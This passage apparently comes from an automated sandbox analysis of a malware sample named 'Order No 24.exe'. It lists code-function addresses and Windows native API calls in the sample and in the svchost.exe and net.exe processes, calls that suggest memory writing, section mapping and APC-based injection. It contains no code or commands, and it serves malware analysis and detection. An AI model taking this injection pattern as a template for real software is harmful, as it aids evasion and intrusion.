                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52AF0 NtWriteFile,LdrInitializeThunk,4_2_02F52AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52AD0 NtReadFile,LdrInitializeThunk,4_2_02F52AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02F52BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02F52BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02F52BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52B60 NtClose,LdrInitializeThunk,4_2_02F52B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02F52EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02F52E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52FE0 NtCreateFile,LdrInitializeThunk,4_2_02F52FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52FB0 NtResumeThread,LdrInitializeThunk,4_2_02F52FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52F30 NtCreateSection,LdrInitializeThunk,4_2_02F52F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02F52CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02F52C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52C60 NtCreateKey,LdrInitializeThunk,4_2_02F52C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02F52DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52DD0 NtDelayExecution,LdrInitializeThunk,4_2_02F52DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02F52D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02F52D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F535C0 NtCreateMutant,LdrInitializeThunk,4_2_02F535C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F539B0 NtGetContextThread,LdrInitializeThunk,4_2_02F539B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52AB0 NtWaitForSingleObject,4_2_02F52AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52B80 NtQueryInformationFile,4_2_02F52B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52EA0 NtAdjustPrivilegesToken,4_2_02F52EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52E30 NtWriteVirtualMemory,4_2_02F52E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52FA0 NtQuerySection,4_2_02F52FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52F90 NtProtectVirtualMemory,4_2_02F52F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52F60 NtCreateProcessEx,4_2_02F52F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52CF0 NtOpenProcess,4_2_02F52CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52CC0 NtQueryVirtualMemory,4_2_02F52CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52C00 NtQueryInformationProcess,4_2_02F52C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52DB0 NtEnumerateKey,4_2_02F52DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F52D00 NtSetInformationFile,4_2_02F52D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F53090 NtSetValueKey,4_2_02F53090
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F53010 NtOpenDirectoryObject,4_2_02F53010
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F53D70 NtOpenThread,4_2_02F53D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F53D10 NtOpenProcessToken,4_2_02F53D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B9310 NtCreateFile,4_2_003B9310
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B9480 NtReadFile,4_2_003B9480
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B9580 NtDeleteFile,4_2_003B9580
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B9620 NtClose,4_2_003B9620
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B9780 NtAllocateVirtualMemory,4_2_003B9780
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_009C6685
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009BACC5
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009C79D3
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009AB0430_2_009AB043
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009932000_2_00993200
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00993B700_2_00993B70
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B410F0_2_009B410F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A02A40_2_009A02A4
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B038E0_2_009B038E
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0098E3B00_2_0098E3B0
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A06D90_2_009A06D9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B467F0_2_009B467F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009EAACE0_2_009EAACE
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B4BEF0_2_009B4BEF
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009ACCC10_2_009ACCC1
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00986F070_2_00986F07
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0098AF500_2_0098AF50
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009E31BC0_2_009E31BC
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009AD1B90_2_009AD1B9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099B11F0_2_0099B11F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A123A0_2_009A123A
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B724D0_2_009B724D
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C13CA0_2_009C13CA
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009893F00_2_009893F0
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099F5630_2_0099F563
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CB6CC0_2_009CB6CC
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009896C00_2_009896C0
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009877B00_2_009877B0
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009EF7FF0_2_009EF7FF
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B79C90_2_009B79C9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099FA570_2_0099FA57
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00989B600_2_00989B60
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00987D190_2_00987D19
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A9ED00_2_009A9ED0
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099FE6F0_2_0099FE6F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00987FA30_2_00987FA3
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_01274F700_2_01274F70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A8A032_2_004A8A03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BF0432_2_004BF043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004931A02_2_004931A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004912002_2_00491200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A02C32_2_004A02C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A6C432_2_004A6C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491C282_2_00491C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A6C3E2_2_004A6C3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491C302_2_00491C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004914D02_2_004914D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A04E32_2_004A04E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0049E5632_2_0049E563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00492D212_2_00492D21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00492D302_2_00492D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004925DC2_2_004925DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004925E02_2_004925E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FA02C04_2_02FA02C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC02744_2_02FC0274
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2E3F04_2_02F2E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE03E64_2_02FE03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDA3524_2_02FDA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FB20004_2_02FB2000
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD81CC4_2_02FD81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE01AA4_2_02FE01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD41A24_2_02FD41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FA81584_2_02FA8158
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBA1184_2_02FBA118
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F101004_2_02F10100
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3C6E04_2_02F3C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1C7C04_2_02F1C7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F207704_2_02F20770
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F447504_2_02F44750
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCE4F64_2_02FCE4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD24464_2_02FD2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC44204_2_02FC4420
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE05914_2_02FE0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F205354_2_02F20535
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1EA804_2_02F1EA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD6BD74_2_02FD6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDAB404_2_02FDAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F4E8F04_2_02F4E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F068B84_2_02F068B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F228404_2_02F22840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2A8404_2_02F2A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F229A04_2_02F229A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FEA9A64_2_02FEA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F369624_2_02F36962
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDEEDB4_2_02FDEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F32E904_2_02F32E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDCE934_2_02FDCE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F20E594_2_02F20E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDEE264_2_02FDEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2CFE04_2_02F2CFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F12FC84_2_02F12FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F9EFA04_2_02F9EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F94F404_2_02F94F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F40F304_2_02F40F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC2F304_2_02FC2F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F62F284_2_02F62F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F10CF24_2_02F10CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC0CB54_2_02FC0CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F20C004_2_02F20C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1ADE04_2_02F1ADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F38DBF4_2_02F38DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBCD1F4_2_02FBCD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2AD004_2_02F2AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC12ED4_2_02FC12ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3B2C04_2_02F3B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F252A04_2_02F252A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F6739A4_2_02F6739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0D34C4_2_02F0D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD132D4_2_02FD132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD70E94_2_02FD70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF0E04_2_02FDF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCF0CC4_2_02FCF0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F270C04_2_02F270C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2B1B04_2_02F2B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0F1724_2_02F0F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FEB16B4_2_02FEB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F5516C4_2_02F5516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD16CC4_2_02FD16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF7B04_2_02FDF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F114604_2_02F11460
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF43F4_2_02FDF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBD5B04_2_02FBD5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD75714_2_02FD7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCDAC64_2_02FCDAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F65AA04_2_02F65AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBDAAC4_2_02FBDAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC1AA34_2_02FC1AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F93A6C4_2_02F93A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFA494_2_02FDFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD7A464_2_02FD7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F95BF04_2_02F95BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F5DBF94_2_02F5DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3FB804_2_02F3FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFB764_2_02FDFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F238E04_2_02F238E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F8D8004_2_02F8D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F299504_2_02F29950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3B9504_2_02F3B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FB59104_2_02FB5910
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F29EB04_2_02F29EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFFB14_2_02FDFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F21F924_2_02F21F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFF094_2_02FDFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFCF24_2_02FDFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F99C324_2_02F99C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3FDC04_2_02F3FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD7D734_2_02FD7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD1D5A4_2_02FD1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F23D404_2_02F23D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A1F804_2_003A1F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039CEA04_2_0039CEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039D0C04_2_0039D0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039B1404_2_0039B140
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A55E04_2_003A55E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A38204_2_003A3820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A381B4_2_003A381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003BBC204_2_003BBC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C852244_2_02C85224
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E3044_2_02C7E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E1E44_2_02C7E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7D7684_2_02C7D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E46C4_2_02C7E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
